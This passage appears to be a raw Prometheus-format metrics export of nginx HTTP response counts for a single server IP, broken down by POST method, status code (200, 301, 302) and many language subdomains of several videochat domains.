nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="udm.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="udm.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="udm.videochat.mx"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="udm.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="udm.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="udm.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="uk.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="uk.videochat.date"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="uk.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="uk.videochat.tv.br"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="uk.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ur.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ur.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ur.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ur.videochat.tv.br"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ur.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="uz.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="uz.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="uz.videochat.show"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="uz.videochat.tv.br"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="uz.videochat.world"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="vi.videochat.cafe"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="vi.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="vi.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="vi.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="vi.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="videochat.cafe"} 239 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="videochat.date"} 219 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="videochat.mx"} 215 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="videochat.show"} 166 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="videochat.tv.br"} 2684 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="videochat.world"} 266 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="xh.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="xh.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="xh.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="xh.videochat.tv.br"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="xh.videochat.world"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="yi.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="yi.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="yi.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="yi.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="yi.videochat.tv.br"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="yi.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="zh.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="zh.videochat.date"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="zh.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="zh.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="zh.videochat.tv.br"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="zh.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="301",vhost="videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="%!s(MISSING)"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="127.0.0.1:80"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="14fc525b-13a8-40c3-8f05-01cd06b04453.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="161.97.120.25"} 391 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="161.97.120.25:80"} 950 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="43822297-98c3-4c96-b5b8-6a4c4675d440.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="8115dadb-0b6b-4cca-ac37-a5cf02c05ca9.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="8f76d726-154f-4e15-83cf-3f4903a60b07.videochat.mx"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="aaexebs.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="af.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="af.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="af.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="af.videochat.show"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="af.videochat.tv.br"} 46 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="af.videochat.world"} 246 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="al.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="al.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="al.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="al.videochat.world"} 264 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="am.videochat.cafe"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="am.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="am.videochat.tv.br"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="am.videochat.world"} 115 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="app.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ar.videochat.cafe"} 196 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ar.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ar.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ar.videochat.show"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ar.videochat.tv.br"} 45 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ar.videochat.world"} 693 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="az.videochat.cafe"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="az.videochat.mx"} 45 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="az.videochat.tv.br"} 49 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="az.videochat.world"} 122 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="azecuhi.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ba.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ba.videochat.date"} 135 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ba.videochat.mx"} 67 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ba.videochat.show"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ba.videochat.tv.br"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ba.videochat.world"} 103 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="be.videochat.cafe"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="be.videochat.date"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="be.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="be.videochat.tv.br"} 310 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="be.videochat.world"} 294 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="bg.videochat.cafe"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="bg.videochat.date"} 149 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="bg.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="bg.videochat.show"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="bg.videochat.tv.br"} 48 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="bg.videochat.world"} 71 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="bn.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="bn.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="bn.videochat.show"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="bn.videochat.tv.br"} 122 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="bn.videochat.world"} 152 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="bs.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="bs.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="bs.videochat.show"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="bs.videochat.tv.br"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="bs.videochat.world"} 66 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="bwfzopl.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ca.videochat.cafe"} 45 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ca.videochat.mx"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ca.videochat.tv.br"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ca.videochat.world"} 142 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ceb.videochat.date"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ceb.videochat.mx"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ceb.videochat.show"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ceb.videochat.tv.br"} 48 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ceb.videochat.world"} 285 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="chm.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="chm.videochat.tv.br"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="chm.videochat.world"} 231 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ckdbbet.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="cloijsk.videochat.mx"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="cs.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="cs.videochat.date"} 173 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="cs.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="cs.videochat.show"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="cs.videochat.tv.br"} 150 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="cs.videochat.world"} 74 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="cy.videochat.cafe"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="cy.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="cy.videochat.mx"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="cy.videochat.show"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="cy.videochat.tv.br"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="cy.videochat.world"} 262 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="cytjruk.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="czhdzka.videochat.mx"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="da.videochat.cafe"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="da.videochat.date"} 100 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="da.videochat.mx"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="da.videochat.show"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="da.videochat.tv.br"} 307 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="da.videochat.world"} 175 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ddb00497-7d32-400e-85c8-bc34712fde6d.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="de.videochat.cafe"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="de.videochat.mx"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="de.videochat.show"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="de.videochat.tv.br"} 66 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="de.videochat.world"} 647 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="dwpqqsi.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ee.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ee.videochat.date"} 49 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ee.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ee.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ee.videochat.tv.br"} 236 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="el.videochat.mx"} 654 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="el.videochat.tv.br"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="el.videochat.world"} 77 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="en.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="en.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="en.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="en.videochat.tv.br"} 73 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="eo.videochat.cafe"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="eo.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="eo.videochat.mx"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="eo.videochat.show"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="eo.videochat.tv.br"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="eo.videochat.world"} 251 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="eojoxne.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="es.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="es.videochat.date"} 84 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="es.videochat.show"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="es.videochat.tv.br"} 111 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="es.videochat.world"} 140 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="esiityi.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="et.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="et.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="et.videochat.show"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="et.videochat.tv.br"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="et.videochat.world"} 74 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="eu.videochat.cafe"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="eu.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="eu.videochat.show"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="eu.videochat.tv.br"} 93 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="eu.videochat.world"} 555 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="fa.videochat.mx"} 140 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="fa.videochat.tv.br"} 347 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="fa.videochat.world"} 225 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="fcflfis.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="fi.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="fi.videochat.date"} 186 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="fi.videochat.mx"} 129 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="fi.videochat.show"} 158 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="fi.videochat.tv.br"} 192 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="fi.videochat.world"} 206 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="fr.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="fr.videochat.show"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="fr.videochat.tv.br"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="fr.videochat.world"} 149 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ga.videochat.cafe"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ga.videochat.mx"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ga.videochat.show"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ga.videochat.tv.br"} 174 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ga.videochat.world"} 69 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="gl.videochat.cafe"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="gl.videochat.mx"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="gl.videochat.tv.br"} 248 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="gl.videochat.world"} 214 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="gu.videochat.cafe"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="gu.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="gu.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="gu.videochat.world"} 233 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="he.videochat.cafe"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="he.videochat.date"} 104 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="he.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="he.videochat.show"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="he.videochat.tv.br"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="he.videochat.world"} 190 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="hi.videochat.cafe"} 46 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="hi.videochat.date"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="hi.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="hi.videochat.show"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="hi.videochat.tv.br"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="hi.videochat.world"} 166 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="hr.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="hr.videochat.date"} 163 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="hr.videochat.mx"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="hr.videochat.show"} 137 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="hr.videochat.tv.br"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="hr.videochat.world"} 186 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ht.videochat.cafe"} 83 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ht.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ht.videochat.show"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ht.videochat.tv.br"} 126 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ht.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="hu.videochat.cafe"} 178 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="hu.videochat.date"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="hu.videochat.mx"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="hu.videochat.tv.br"} 45 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="hu.videochat.world"} 392 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="huvcgmi.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="iclgzbs.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="id.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="id.videochat.mx"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="id.videochat.show"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="id.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="id.videochat.world"} 275 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="is.videochat.cafe"} 45 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="is.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="is.videochat.show"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="is.videochat.tv.br"} 69 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="is.videochat.world"} 231 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="it.videochat.cafe"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="it.videochat.date"} 140 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="it.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="it.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="it.videochat.tv.br"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="it.videochat.world"} 143 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="jaiyuba.videochat.mx"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="jp.videochat.cafe"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="jp.videochat.date"} 122 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="jp.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="jp.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="jp.videochat.tv.br"} 126 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="jp.videochat.world"} 138 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="jv.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="jv.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="jv.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="jv.videochat.show"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="jv.videochat.tv.br"} 303 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="jv.videochat.world"} 104 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ka.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ka.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ka.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ka.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ka.videochat.world"} 15 